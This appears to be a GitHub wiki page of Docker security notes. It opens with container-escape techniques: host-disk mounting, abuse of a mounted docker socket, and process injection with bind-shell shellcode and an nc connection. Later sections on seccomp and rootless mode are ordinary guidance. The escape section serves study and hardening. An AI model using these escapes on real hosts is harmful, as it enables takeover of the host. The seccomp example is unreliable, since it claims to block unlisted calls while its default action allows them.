docker security - ghdrako/doc_snipets GitHub Wiki

ID Techniques Name Minimal Linux Capabilities
1 Mount the host filesystem SYS_ADMIN
2 Use a mounted docker socket No capability is required
3 Process Injection SYS_PTRACE
4 Adding a malicious kernel module SYS_MODULE
5 Reading secrets from the host DAC_READ_SEARCH
6 Overriding files on host DAC_READ_SEARCH, DAC_OVERRIDE
7 Abusing notify on release SYS_ADMIN, DAC_OVERRIDE
  1. Mount the host filesystem Commands to setup a vulnerable container
docker run -it --cap-drop=ALL --cap-add=SYS_ADMIN --security-opt apparmor=unconfined --device=/dev/:/ ubuntu bash

Note: you can find the host filesystem device by executing ‘lsblk’.

Note: AppArmor protection disables ‘mount’ operation even if the SYS_ADMIN capability is assigned to container process. Thus, we disable AppArmor during a vulnerable container creation.

TIP: You can see which AppArmor profile, if any, applies to container’s process by inspecting the ‘/proc/$$/attr/current’ file.

Commands to escape the container

mount /dev/<DEVICE-FILE> /mnt
ls /mnt
  1. Use a mounted docker socket Commands to setup a vulnerable container
docker run -it --cap-drop=ALL -v /var/run/docker.sock:/run/docker.sock ubuntu bash

docker run -it --cap-drop=ALL --cap-add=SETGID --cap-add=SETUID --cap-add=CHOWN --cap-add=FOWNER --cap-add=DAC_OVERRIDE -v /var/run/docker.sock:/run/docker.sock ubuntu bash

Commands to escape the container

Create a privilege container with host filesystem mounted inside the container.

docker run -it --privileged -v /:/host/ ubuntu bash -c "chroot /host/"

In the command above we create a new privileged container that mounts the host files system and uses it to escape from the first container to the host.

  1. Process Injection TIP: you can validate which Linux namespaces are shared between the host and the container by executing ‘lsns’ command on both. The following tools should be installed within the container:
apt install vim # or any other editor
apt install gcc
apt install net-tools
apt install netcat
Required container's host setup:
The container's host should run a Python http server:
/usr/bin/python3 -m http.server 8080 & 

Commands to setup a vulnerable container

docker run -it --pid=host --cap-drop=ALL --cap-add=SYS_PTRACE --security-opt apparmor=unconfined ubuntu bash

Click for extra capabilities command

Note: AppArmor protection disables ‘ptrace’ operation even if the SYS_PTRACE capability is assigned to the container process. Thus, we disable AppArmor during a vulnerable container creation.

Commands to escape the container

In this technique we use this infect.c code (by 0x00pf) to create an injector. We have also replaced the shellcode (lines 36-39) with the following shell code taken from https://www.exploit-db.com/exploits/41128 and changed the ‘SHELLCODE_SIZE’ (line 33) to 87.

"\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"

Use the commands bellow to escape the container:

# List process that runs on the host and container.
ps -eaf | grep "/usr/bin/python3 -m http.server 8080" | head -n 1
# Copy and paste the payload from inject.c
vim inject.c
gcc -o inject inject.c
# Inject the shellcode payload that will open a listener over port 5600
./inject <PID>
# Bind over port 5600
nc <HOST-IP> 5600

Seccomp

Seccomp, short for secure computing mode, is a Linux kernel feature that allows a process to specify the system calls it is allowed to make. This makes it possible to restrict the types of system calls that can be made by a container, which can help improve the security of the host system by reducing the risk of container escape or privilege escalation. When a process specifies its seccomp profile, the Linux kernel filters incoming system calls and only allows those that are specified in the profile. This means that even if an attacker were to gain access to a container, they would be limited in the types of actions they could perform, reducing the impact of the attack.

To create a seccomp profile for a container, you can use the seccomp configuration option in the docker run command. This allows you to specify the seccomp profile to use when starting the container.

There are two main ways to create a seccomp profile: using a predefined profile or creating a custom profile. Predefined profiles are available for common use cases and can be easily specified in the docker run command. For example, the default profile allows all system calls, while the restricted profile only allows a limited set of system calls that are considered safe for most use cases.

To create a custom seccomp profile, you can use the Podman (https://podman.io/blogs/2019/10/15/generate-seccomp- profiles.xhtml) or seccomp-gen (https://github.com/ blacktop/seccomp-gen) tools. Both tools automate figuring out which calls are being made by the container you intend to use in production and generate a JSON file that can be used as the seccomp profile.

Seccomp does not guarantee security. It is important to understand the system calls that are required for your application and ensure that they are allowed in the seccomp profile.

The following is an example of a seccomp profile that allows a limited set of system calls for a container running a web server application:

{
"defaultAction": "SCMP_ACT_ALLOW",
"syscalls": [
{
"name": "accept",
"action": "SCMP_ACT_ALLOW"
},
{
"name": "bind",
"action": "SCMP_ACT_ALLOW"
},
{
"name": "connect",
"action": "SCMP_ACT_ALLOW"
},
{
"name": "listen",
"action": "SCMP_ACT_ALLOW"
},
 {
"name": "sendto",
"action": "SCMP_ACT_ALLOW"
},
{
"name": "recvfrom",
"action": "SCMP_ACT_ALLOW"
},
{
"name": "read",
"action": "SCMP_ACT_ALLOW"
},
{
"name": "write",
"action": "SCMP_ACT_ALLOW"
}
]
}

In this example, defaultAction is set to SCMP_ACT_ALLOW, which means that all system calls not specifically listed in the syscalls array will be allowed. To block all not-defined calls, you can use SCMP_ACT_ERRNO as a default action. All available actions are described in the online manual for the seccomp_rule_add filter specification: https://man7.org/linux/man-pages/man3/seccomp_rule_add.3.xhtml. The syscalls array lists the system calls that should be allowed for the container and specifies the action to take for each call (in this case, all calls are allowed). This profile only allows the system calls necessary for a web server to function and blocks all other system calls, improving the security of the container.

More information about system calls is available here: https://docs.docker.com/engine/security/seccomp/.

Rootless mode

Docker Rootless mode is a feature that allows users to run Docker containers without having to run the Docker daemon as the root user. This mode provides an additional layer of security by reducing the attack surface of the host system and minimizing the risk of privilege escalation.

Let’s set up a rootless Docker daemon on Ubuntu Linux or Debian Linux. First, make sure you’ve installed Docker from the official Docker package repository instead of the Ubuntu/ Debian package:

admin@myhome:~$ sudo apt-get install -y -qq apt-
transport-https ca-certificates curl
admin@myhome:~$ sudo mkdir -p /etc/apt/keyrings &&
sudo chmod -R 0755 /etc/apt/keyrings
admin@myhome:~$ curl -fsSL "https://
download.docker.com/linux/ubuntu/gpg" | sudo gpg --
dearmor --yes -o /etc/apt/keyrings/docker.gpg
admin@myhome:~$ sudo chmod a+r /etc/apt/keyrings/
docker.gpg
admin@myhome:~$ echo "deb [arch=amd64 signed-by=/etc/
apt/keyrings/docker.gpg] https://download.docker.com/
linux/ubuntu jammy stable" | sudo tee /etc/apt/
sources.list.d/docker.list
admin@myhome:~$ sudo apt-get update
admin@myhome:~$ sudo apt-get install -y docker-ce
docker-ce-cli containerd.io docker-scan-plugin
docker-compose-plugin docker-ce-rootless-extras
docker-buildx-plugin

docker-ce-rootless-extras will install a shell script in your /usr/bin directory named dockerd-rootless-setuptool.sh, which will automate the whole process:

admin@myhome~$ dockerd-rootless-setuptool.sh --help
Usage: /usr/bin/dockerd-rootless-setuptool.sh
[OPTIONS] COMMAND
A setup tool for Rootless Docker (dockerd-
rootless.sh).
Documentation: https://docs.docker.com/go/rootless/
Options:
-f, --force Ignore rootful Docker (/
var/run/docker.sock)
--skip-iptables Ignore missing iptables
Commands:
check Check prerequisites
install Install systemd unit (if systemd is
available) and show how to manage the service
uninstall Uninstall systemd unit

To run this script, we will need a non-root user with a configured environment to be able to run the Docker daemon. Let’s create a dockeruser user first:

admin@myhome~$ sudo adduser dockeruser
Adding user `dockeruser' ...
Adding new group `dockeruser' (1001) ...
Adding new user `dockeruser' (1001) with group
`dockeruser' ...
Creating home directory `/home/dockeruser' ...
Copying files from `/etc/skel' ...
New password:
Retype new password:
passwd: password updated successfully
Changing the user information for dockeruser
Enter the new value, or press ENTER for the default
 Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n] y

Let’s also create a UID map configuration before we proceed. To do that, we will need to install the uidmap package and create the /etc/subuid and /etc/subgid configuration files:

admin@myhome~$ sudo apt install -y uidmap
admin@myhome~$ echo "dockeruser:100000:65536" | sudo
tee /etc/subuid
admin@myhome~$ echo "dockeruser:100000:65536" | sudo
tee /etc/subgid
Log in as dockeruser and run the dockerd-rootless-
setuptool.sh script:
admin@myhome~$ sudo -i -u dockeruser

Make sure environment XDG_RUNTIME_DIR is set and systemd can read environment variables from dockeruser:

$ export XDG_RUNTIME_DIR=/run/user/$UID
$ echo 'export XDG_RUNTIME_DIR=/run/user/$UID' >>
~/.bashrc
$ systemctl --user show-environment
HOME=/home/dockeruser
LANG=en_US.UTF-8
LOGNAME=dockeruser
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/
bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/
bin:/snap/bin
SHELL=/bin/bash
SYSTEMD_EXEC_PID=720
USER=dockeruser
XDG_RUNTIME_DIR=/run/user/1001
XDG_DATA_DIRS=/usr/local/share/:/usr/share/:/var/lib/
snapd/desktop
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1001/bus

Now, you can install rootless Docker using the dockerd- rootless-setuptool.sh script (some output has been truncated for readability):

$ dockerd-rootless-setuptool.sh install
[INFO] Creating [condensed for brevity]
Active: active (running) since Fri 2023-02-17
14:19:04 UTC; 3s ago
+ DOCKER_HOST=unix:///run/user/1001/docker.sock /usr/
bin/docker version
Client: Docker Engine - Community
Version: 23.0.1
[condensed for brevity]
Server: Docker Engine - Community
Engine:
Version: 23.0.1
[condensed for brevity]
rootlesskit:
Version: 1.1.0
[condensed for brevity]
+ systemctl --user enable docker.service
Created symlink /home/dockeruser/.config/systemd/
user/default.target.wants/docker.service → /home/
dockeruser/.config/systemd/user/docker.service.
[INFO] Installed docker.service successfully.
Now, let’s verify if we can use the Docker rootless daemon:
dockeruser@vagrant:~$ export DOCKER_HOST=unix:///run/
user/1001/docker.sock
dockeruser@vagrant:~$ docker ps
CONTAINER
ID IMAGE COMMAND CREATED STATUS PORTS NAMES

At this point, we have a Docker daemon running as a dockeruser system user instead of root. We will be able to run all services we need the same way we would in a standard configuration. There are some exceptions, such as a Docker in Docker setup, which require further configuration. More detailed information about rootless mode can be found at https://docs.docker.com/engine/security/rootless/.

⚠️ **GitHub.com Fallback** ⚠️